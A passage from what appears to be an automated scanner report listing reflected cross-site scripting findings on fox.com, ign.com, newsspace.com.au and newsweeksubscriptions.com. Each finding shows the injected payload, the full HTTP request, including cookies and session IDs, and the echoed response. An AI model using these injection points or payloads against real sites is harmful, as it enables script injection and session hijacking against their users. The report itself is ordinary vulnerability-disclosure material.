s_analytics.pageName="fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombinedjs"
s_analytics.hier1="fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombi
...[SNIP]...

1.180. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8760"-alert(1)-"1dac83bc5b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/jse8760"-alert(1)-"1dac83bc5b5/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%255D%7C1475608962059%3B%20s_vnum%3D1320123600936%2526vn%253D3%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317758115849%3B%20s_dayslastvisit%3D1317756315852%7C1412364315852%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758115852%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 21803
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:08:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combinedjs"
s_analytics.hier1="fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combined
...[SNIP]...

1.181. http://www.ign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60cfa"><script>alert(1)</script>f5202b2023e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?60cfa"><script>alert(1)</script>f5202b2023e=1 HTTP/1.1
Host: www.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newscorp.com/operations/other.html#
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=1.2111014431.1317753408.1317753408.1317753408.1; __utmz=1.1317753408.1.1.utmccn=(referral)|utmcsr=newscorp.com|utmcct=/management/ndm.html|utmcmd=referral; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317753406.1317756133.2; __utmz=173446715.1317756133.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317756133746%7C1412364133746%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757933746%3B; rsi_segs=; _chartbeat2=wv9yj68rlyzfi46p.1317753412044

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 20:08:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:08:38 GMT
Content-Length: 95193
Connection: close
Vary: Accept-Encoding
Set-Cookie: freq=c-1317758914106v-4n-12mc+1317758914106mv+4mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=rivq9nyyyl63;Path=/includes
Set-Cookie: JSESSIONID=2ibcigl3g2ag2;Path=/includes
Set-Cookie: JSESSIONID=f5ip1gfp6sa;Path=/includes
Set-Cookie: JSESSIONID=oamcggqq4ah6;Path=/includes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.ign.com/?60cfa"><script>alert(1)</script>f5202b2023e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.182. http://www.ign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7dcf"-alert(1)-"19caa501bc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?a7dcf"-alert(1)-"19caa501bc7=1 HTTP/1.1
Host: www.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newscorp.com/operations/other.html#
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=1.2111014431.1317753408.1317753408.1317753408.1; __utmz=1.1317753408.1.1.utmccn=(referral)|utmcsr=newscorp.com|utmcct=/management/ndm.html|utmcmd=referral; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317753406.1317756133.2; __utmz=173446715.1317756133.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317756133746%7C1412364133746%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757933746%3B; rsi_segs=; _chartbeat2=wv9yj68rlyzfi46p.1317753412044

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 20:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:08:45 GMT
Content-Length: 95134
Connection: close
Vary: Accept-Encoding
Set-Cookie: freq=c-1317758923156v-8n-12mc+1317758923156mv+8mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=17quqprxngee6;Path=/includes
Set-Cookie: JSESSIONID=7ftgm1kdh5kke;Path=/includes
Set-Cookie: JSESSIONID=6r955ega3eltd;Path=/includes
Set-Cookie: JSESSIONID=mgkyd24htr9d;Path=/includes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.ign.com/?a7dcf"-alert(1)-"19caa501bc7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.183. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c803"><script>alert(1)</script>0df4efac27e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?1c803"><script>alert(1)</script>0df4efac27e=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317765257189v-180n-12mc+1317765257189mv+180mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Video Game Reviews
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.ign.com/index/features.html?1c803"><script>alert(1)</script>0df4efac27e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.184. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b69"-alert(1)-"9a9ea4a4bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/features.html?19b69"-alert(1)-"9a9ea4a4bdc=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:54:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317765260190v-184n-12mc+1317765260190mv+184mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Game Reviews
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.ign.com/index/features.html?19b69"-alert(1)-"9a9ea4a4bdc=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.185. http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cf7b<script>alert(1)</script>d47d2b4ac26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/08/15/batman-arkham-city-mr-freeze-trailer?1cf7b<script>alert(1)</script>d47d2b4ac26=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer?1cf7b<script>alert(1)</script>d47d2b4ac26=1</div>
...[SNIP]...

1.186. http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a799f<script>alert(1)</script>e8dd4602a2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2?a799f<script>alert(1)</script>e8dd4602a2f=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2?a799f<script>alert(1)</script>e8dd4602a2f=1</div>
...[SNIP]...

1.187. http://www.ign.com/videos/2011/09/15/rage-launch-trailer [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/videos/2011/09/15/rage-launch-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f414<script>alert(1)</script>1d9dc8200f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/09/15/rage-launch-trailer?3f414<script>alert(1)</script>1d9dc8200f4=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/09/15/rage-launch-trailer?3f414<script>alert(1)</script>1d9dc8200f4=1</div>
...[SNIP]...

1.188. http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ign.com
Path:	/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14433<script>alert(1)</script>5e2c9dc9589 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer?14433<script>alert(1)</script>5e2c9dc9589=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer?14433<script>alert(1)</script>5e2c9dc9589=1</div>
...[SNIP]...

1.189. http://www.newsspace.com.au/digital [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.newsspace.com.au
Path:	/digital

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31334"%3bd8a0fd0d83 was submitted in the REST URL parameter 1. This input was echoed as 31334";d8a0fd0d83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /digital31334"%3bd8a0fd0d83 HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<![CDATA[
                       $(function (){
                           $("#main_menu-digital31334";d8a0fd0d83")
                               .addClass("current")
                               .find(">
...[SNIP]...

1.190. http://www.newsspace.com.au/digital [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsspace.com.au
Path:	/digital

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0e9"><img%20src%3da%20onerror%3dalert(1)>873c82dc86e was submitted in the REST URL parameter 1. This input was echoed as bf0e9"><img src=a onerror=alert(1)>873c82dc86e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /digitalbf0e9"><img%20src%3da%20onerror%3dalert(1)>873c82dc86e HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<div style="padding: 0px 19px 19px 19px" id="digitalbf0e9"><img src=a onerror=alert(1)>873c82dc86e_content_section">
...[SNIP]...

1.191. http://www.newsspace.com.au/news.com.au [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsspace.com.au
Path:	/news.com.au

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ca6"><img%20src%3da%20onerror%3dalert(1)>971828b2e2b was submitted in the REST URL parameter 1. This input was echoed as 17ca6"><img src=a onerror=alert(1)>971828b2e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news.com.au17ca6"><img%20src%3da%20onerror%3dalert(1)>971828b2e2b HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<div style="padding: 0px 19px 19px 19px" id="news.com.au17ca6"><img src=a onerror=alert(1)>971828b2e2b_content_section">
...[SNIP]...

1.192. http://www.newsspace.com.au/news.com.au [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.newsspace.com.au
Path:	/news.com.au

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16009"%3ba1ac7d093df was submitted in the REST URL parameter 1. This input was echoed as 16009";a1ac7d093df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /news.com.au16009"%3ba1ac7d093df HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<![CDATA[
                       $(function (){
                           $("#main_menu-news.com.au16009";a1ac7d093df")
                               .addClass("current")
                               .find(">
...[SNIP]...

1.193. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2cabd<script>alert(1)</script>7f6f1f6df69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial292cabd<script>alert(1)</script>7f6f1f6df69/index.php?off2on_login_url=/promo&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 524
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /4freetrial292cabd<script>alert(1)</script>7f6f1f6df69 is not found !</p>
...[SNIP]...

1.194. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3789<script>alert(1)</script>41a04ebeece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /4freetrial29/d3789<script>alert(1)</script>41a04ebeece?off2on_login_url=/promo&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 783
Keep-Alive: timeout=15, max=80
